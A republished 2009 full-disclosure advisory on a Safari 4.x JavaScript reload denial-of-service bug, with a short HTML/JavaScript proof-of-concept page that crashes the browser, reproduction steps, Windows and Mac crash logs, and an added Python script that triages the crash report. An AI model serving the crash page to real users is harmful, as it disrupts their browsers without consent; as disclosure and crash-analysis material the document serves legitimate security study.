
Apple Safari 4.x Crash Exploit

02 Jul 2009 | Reported by SkyOut | Type: packetstorm | Source: packetstormsecurity.com

Apple Safari 4.x JavaScript Reload Denial of Service, Crash Exploit. Steps to reproduce and advisory included.

Code
`___________________________________________________________________________________  
  
Apple Safari 4.x JavaScript Reload Denial of Service  
___________________________________________________________________________________  
  
Author : Marcell 'SkyOut' Dietl, Achim Hoffmann  
Email : mail [at] marcell-dietl [dot] de  
Vendor : http://www.apple.com/  
Product : http://www.apple.com/safari/  
Found : 12.06.2009  
Released : 01.07.2009  
  
Tested on:  
- Safari 4.0 at Windows XP SP3  
- Safari 4.0.1 at Mac OS X 10.5.7  
___________________________________________________________________________________  
STEPS TO REPRODUCE  
  
1) Create an HTML file with the following content:  
  
+----------  
| <html>  
| <body>  
| <script src="empty.js"></script>  
| <script>  
| try { crashSafari(); } catch(e) {  
| setTimeout("location.reload();",42);  
| prompt('apple culpa? comment:'); }  
| </script>  
| </body>  
| </html>  
+----------  
  
2) Create an empty file called "empty.js" in the same directory.  
  
3) Put both files into the WWW directory of your server.  
  
4) Access the HTML file with your browser.  
- A popup will appear: Close it.  
- A popup will appear: Close it.  
- Crash.  
  
5) On Windows:  
  
+----------  
| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll  
| ModVer: 4.530.17.0 Offset: 00305f55  
+----------  
  
5) On Mac OS X:  
  
+----------  
| Process: Safari [298]  
| Path: /Applications/Safari.app/Contents/MacOS/Safari  
| Identifier: com.apple.Safari  
| Version: 4.0.1 (5530.18)  
| Build Info: WebBrowser-55301800~1  
| Code Type: X86 (Native)  
| Parent Process: launchd [163]  
|  
| Date/Time: 2009-07-01 00:58:48.144 +0200  
| OS Version: Mac OS X 10.5.7 (9J61)  
| Report Version: 6  
|  
| Exception Type: EXC_BAD_ACCESS (SIGBUS)  
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002  
|  
| Thread 0 crashed with X86 Thread State (32-bit):  
| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000  
| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0  
| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017  
| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037  
| cr2: 0x00000002  
+----------  
___________________________________________________________________________________  
Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php  
  
Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html  
  
Apple has been informed about the bug, but did not show any interest.  
___________________________________________________________________________________  
HAVING FUN WITH FULL DISCLOSURE SINCE 2006  
  
`
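
For triage of the Mac OS X crash excerpt above, the following added example (not part of the original advisory) parses the exception fields and register state and flags a near-NULL fault address. The sample input is the advisory's own excerpt; the function names and the one-page threshold are assumptions of this example.

```python
import re

# Sample input: the Mac OS X crash excerpt from the advisory, box borders removed.
SAMPLE_REPORT = """\
Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002
Thread 0 crashed with X86 Thread State (32-bit):
eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000
edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0
ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
cr2: 0x00000002
"""

PAGE_SIZE = 0x1000  # assumption of this example: faults below one page are "near-NULL"

def parse_crash(report):
    """Extract exception fields and register values from a crash-report excerpt."""
    info = {"registers": {}}
    for raw in report.splitlines():
        line = raw.lstrip("| ").strip()  # tolerate the advisory's "| " box prefix
        m = re.match(r"Exception Type:\s+(\S+)\s+\((\w+)\)", line)
        if m:
            info["exception"], info["signal"] = m.groups()
            continue
        m = re.match(r"Exception Codes:\s+(\w+) at (0x[0-9a-fA-F]+)", line)
        if m:
            info["code"], info["fault_addr"] = m.group(1), int(m.group(2), 16)
            continue
        # Register lines look like "eax: 0x00000002 ebx: 0x900bac11 ..."
        for name, val in re.findall(r"\b([a-z][a-z0-9]{1,3}):\s+(0x[0-9a-fA-F]+)", line):
            info["registers"][name] = int(val, 16)
    return info

def triage(info):
    """Heuristic summary of the faulting access; not an exploitability verdict."""
    addr = info.get("fault_addr")
    regs = info["registers"]
    return {
        "fault_addr": addr,
        "near_null": addr is not None and addr < PAGE_SIZE,
        # cr2 holds the faulting linear address on x86; it should match the report
        "cr2_consistent": addr is not None and regs.get("cr2") == addr,
        # general-purpose registers holding the faulting address at crash time
        "regs_holding_addr": sorted(r for r, v in regs.items() if v == addr and r != "cr2"),
    }

if __name__ == "__main__":
    print(triage(parse_crash(SAMPLE_REPORT)))
```

On this excerpt the fault address is 2 and both eax and esi hold 2, which is consistent with an access through a near-NULL pointer and with the advisory's denial-of-service classification.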
